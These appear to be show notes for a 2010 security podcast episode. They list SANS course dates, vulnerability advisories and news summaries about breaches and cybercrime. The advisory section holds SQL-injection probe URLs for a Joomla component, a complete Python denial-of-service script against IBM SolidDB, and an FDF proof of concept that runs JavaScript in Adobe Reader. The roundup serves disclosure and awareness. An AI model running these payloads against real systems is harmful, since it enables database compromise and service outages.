Episode 54 – Meat Detonation

FORENSICS 606: Drive and Data Recovery Forensics    2/9/10 to 2/13/10
SEC-502: Perimeter Protection In-Depth    2/22/10 to 2/27/10
AUD-507: Auditing Networks, Perimeters, and Systems    3/15/10 to 3/20/10
MGT-512: SANS Security Leadership Essentials For Managers with Knowledge Compression    4/15/10 to 4/21/10
SEC-566: 20 Critical Security Controls – In Depth    5/17/10 to 5/21/10

Go online to register by going to the SANS website or call (301) 654-SANS(7267).

SANS 2010 Orlando, Fl. March 6 – 15, 2010 (http://www.sans.org/sans-2010/)

Vulnerabilities of Interest:

1. The JBDiary component for Joomla! is subject to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.  Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Example URLs:http://www.sample.com/?newyear=2011′+and+substring(@@version,1,1)=4%23&newmonth=01

   http://www.sample.com/?newyear=2011′+and+substring(@@version,1,1)=5%23&newmonth=01

   http://www.sample.com/?newyear=2011&newmonth=01′+and+substring(@@version,1,1)=4%23

   http://www.sample.com/?newyear=2011&newmonth=01′+and+substring(@@version,1,1)=5%23

2. IBM SolidDB is subject to a remote denial-of-service vulnerability. An attacker may leverage this issue to crash the affected application, denying service to affected users. This issue affects SolidDB 6.30.0.29 and 6.30.0.33; other versions may also be affected.  Exploit code is available:
   #!python
   import socket
   import struct

   #maxlen 0xA
   a = struct.pack(‘<b’, 2)
   a += struct.pack(‘<H’, 0)
   a += struct.pack(‘<H’,0xFEFF)
   a += struct.pack(‘<H’,0xFEFF)
   a += “1234″

   target_ip = ‘X.X.X.X’

   s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
   s.connect ((target_ip, 2315))

   s.send(a)
   s.close()

3. Google Chrome is subject to multiple vulnerabilities including multiple memory-corruption issues, multiple security-bypass issues, input-validation issues and denial-of-service issues. Attackers can exploit these issues to bypass certain security checks, execute arbitrary code in the context of the browser, and cause denial-of-service conditions; other attacks are also possible. Versions prior to Chrome 4.0.249.78 are vulnerable. Attackers can use standard tools to exploit some of the issues; other issues may require exploit code.
4. Adobe Reader and Acrobat are subject to a remote security-bypass vulnerability.An attacker can exploit this issue to obtain the contents of sensitive PDF files or to perform cross-site scripting attacks against domains hosting PDF files. Example PDF:
   %FDF-1.2
   1 0 obj
   <<
   /FDF
   <<
   /F(http://www.sample.com/any.pdf)
   /JavaScript
   <<
   /After (app.alert(“Executing script inside Acrobat at “+URL);)
   >>
   >>
   >>
   endobj
   trailer
   <</Root 1 0 R>>

News Items of Interest:

News item 1:http://www.theregister.co.uk/2010/01/25/oil_companies_attacked/

At least three US oil companies were victims of highly targeted, email-borne attacks designed to siphon valuable data from their corporate networks and send it abroad, according to a published report citing unnamed people and government documents.

The attacks against Marathon Oil, ExxonMobil, and ConocoPhillips began with emails sent to senior executives that included links to booby-trapped websites, according to the report in The Christian Science Monitor. The breaches focused on the companies’ proprietary “bid data” detailing the quantity, value, and location of petroleum discoveries worldwide. The report said at least some of the attacks appeared to originate in China, but didn’t provide proof beyond the existence of servers located in that country used to store some of the stolen data.

News item 2:http://www.dailymail.co.uk/news/article-1245622/For-sale-Personal-details-millions-Ladbrokes-gamblers.html

The confidential records of millions of British gamblers who bet with top bookmaker Ladbrokes have been offered for sale to The Mail on Sunday.

The huge data theft is now at the center of a criminal investigation after this newspaper was given the personal information of 10,000 Ladbrokes customers and offered access to its database of 4.5 million people in the UK and abroad.  The records include customers’ home addresses, details of their gambling history, customer account numbers, dates of birth, phone numbers and email addresses.

News item 3: http://www.lasvegassun.com/news/2010/jan/25/umc-patient-info-leaks-likely-date-back-july/
For more than three months someone at University Medical Center illegally leaked the personal information of traffic accident victims — a breach of social security numbers, birth dates and more that only stopped when the Las Vegas Sun contacted the hospital about it, according to a statement released today by UMC.

News item 4: http://news.cnet.com/8301-27080_3-10441004-245.html

People behind the China-based online attacks of Google and other companies looked up key employees on social networks and contacted them pretending to be their friends to get the workers to click on links leading to malware, according to a published report on Monday.  “The most significant discovery is that the attackers had selected employees at the companies with access to proprietary data, then learnt who their friends were,” the Financial Times reported. “The hackers compromised the social network accounts of those friends, hoping to enhance the probability that their final targets would click on the links they sent.”
News item 5: http://blog.osvdb.org/2010/01/24/microsoft-aurora-and-something-about-forest-and-trees
Why do we care that Microsoft sits on vulnerabilities for six months? Why is that such a big deal? Am I the only one who missed the articles pointing out that they actually sat on five code other execution bugs for much longer?

News item 6: http://www.businesscomputingworld.co.uk/?p=3347

Some additional news out of CES is that Victorinox’s swiss army knife remained uncracked – and that the $100,000 prize went unclaimed.  Even if someone had cracked the 2010 version of the famous Swiss Army knife, they would have obtained a lot more than $100,000 from other sources. Victorinox, the manufacturers of the Swiss Army knife, which dates back to the late 1800s in its various forms, has made much of the unit’s tamper-proof self-destruct mode, but the reality is that the crypto USB drive supports elliptical curve and AES encryption, which makes it almost impervious to crackers using current known technology.
As Schneier observed in his research, cryptography is all about safety margins. If a hacker manages to crack 128-bit AES technology, then you can bet your bottom line that Schneier would be interested, and governments would pay a lot more than $100,000 for the secret. But this clearly isn’t going to happen for some time to come, so I think Victorinox’ cash is safe for the time being.

News item 7:  http://www.wired.com/threatlevel/2010/01/jilsi-pleads-guilty

A former ringleader of a top internet carding site run secretly by the FBI has pleaded guilty in the United Kingdom. Renukanth Subramaniam, aka JiLsi, was a former Pizza Hut delivery guy who helped run one of the leading English-language criminal sites, DarkMarket. The site operated as an international cyber-bazaar for more than 2,000 hackers, carders and identity thieves until it was closed in 2008.

Members of the site traded in stolen bank card and identification data. They bought and sold specialized equipment for skimming card and PIN numbers, and for cloning data to blank cards. The activities on DarkMarket are estimated to have resulted in fraud amounting to tens of millions of dollars.

News item 8:http://news.cnet.com/8301-27080_3-10439263-245.html

The California Department of Motor Vehicles department suffered a network outage on Thursday due to an equipment glitch, a state official said. A router switch malfunctioned, said Bill Maile, spokesman for Office of Technology Services for the state of California. “It’s very rare,” he said. “Our staff quickly diagnosed the problem and re-routed network traffic to restore connectivity.” The network was down for about two hours and was restored at about 1:40 p.m. PST, according to Maile. There are 168 DMV offices throughout the state, said Jan Mendoza, spokeswoman for the DMV. “We didn’t close offices,” she said. “When people came in we handled customers manually. We did it the old-fashioned way–with pen and paper.”
News item 9:http://www.eetimes.com/news/design/showArticle.jhtml?articleID=222301321
The IEEE has launched a new Web site that consolidates information about smart electric grids from it various societies. The portal is one of many activities from an IEEE smart grid initiative coordinating the organization’s work on the transition to digital, networked power systems and services.

The smart grid is “so interdisciplinary,” said Wanda Reder, chair of the IEEE Smart Grid Task Force and former president of the IEEE Power & Energy Society. “We have the gamut covered in technical interests, but we needed a way to facilitate communications between our many entities to link information on all the conferences, papers and standards we have in this area,” she added.

The Web site lists many of the estimated 100 existing IEEE standards related to smart grids. It also includes pointers to the IEEE 2030 group started last year that aims to release a draft guide to smart grid design in early 2011.
News item 10:  http://news.zdnet.co.uk/security/0,1000000189,40005862,00.htm?s_cid=248use hackers are the “noisiest and easiest to detect”,
Many organizations are focused on stopping random hackers and blocking pornography when they should be concerned with bigger threats from professional cybercriminals, according to a new cybersecurity report.

In a survey conducted in 2009 of 523 IT and security managers, top-level executives and law-enforcement personnel, hackers were rated the biggest threat, followed by insiders and foreign entities — probably because hackers are the “noisiest and easiest to detect”, the 2010 CyberSecurity Watch Survey concluded.